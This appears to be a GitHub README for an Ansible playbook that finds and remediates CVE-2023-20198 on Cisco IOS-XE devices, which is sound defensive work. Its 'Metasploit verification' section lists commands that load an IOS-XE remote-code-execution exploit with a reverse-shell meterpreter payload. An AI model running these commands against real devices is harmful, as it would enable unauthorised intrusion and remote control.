netbell / CVE-2023-20198-Fix

Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


This repository contains an Ansible playbook for remediating the CVE-2023-20198 vulnerability found in certain Cisco devices.

It does the following:

  1. Checks if the web service is running on the router by checking for the associated commands in the running config
  2. Disables the web service if running
  3. Saves the configuration if changed
  4. Checks the logs for signs of previous exploitation

Directory Structure:

├── ansible.cfg            # Ansible configuration file
├── group_vars/            # Directory for variables specific to groups of hosts
│   └── iosxe_devices.yml  # Variable definitions for IOS-XE devices
├── inventory.yml          # Inventory of hosts, including devices to target
└── remediate.yml          # Playbook for remediating CVE-2023-20198

Getting Started


Ensure you have Ansible installed on your control machine. This playbook was written for Ansible 2.9 or newer.


Configure Ansible: Edit ansible.cfg to match your environment settings.


Update inventory.yml with the host details of your IOS-XE devices.


Define any necessary variables in group_vars/iosxe_devices.yml. This should include any common settings for your IOS-XE devices, such as connection settings and credentials.

Adding Hosts to Inventory

To add a new IOS-XE device to the inventory, edit the inventory.yml file and append the new host under the appropriate group:

      # ... other necessary variables

Replace new_router01 with your device's hostname and the ansible_* variables with the actual values for your device.

Updating Group Variables

If you need to update credentials or other settings for the group of IOS-XE devices, edit the group_vars/iosxe_devices.yml file:

ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password            # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password     # Lab use only, store credentials responsibly!
# ... other variables

Running the Playbook

To execute the playbook, use the following command:

ansible-playbook remediate.yml -i inventory.yml

Metasploit verification

MSF6 Commands

use exploit/linux/misc/cisco_ios_xe_rce
set RHOST     # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp

Pre Remediation check


Playbook Run


Post Remediation check



Always test your changes in a controlled environment before running the playbook in production.


Store sensitive data such as passwords and secret keys using Ansible Vault. Do not store plaintext credentials in your inventory or group_vars files.

For additional security measures and best practices, consult Ansible's official documentation.

Please replace all placeholder values with actual data that corresponds to your environment. This README assumes a basic familiarity with Ansible concepts such as inventory, variables, and running playbooks.


Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198

License:MIT License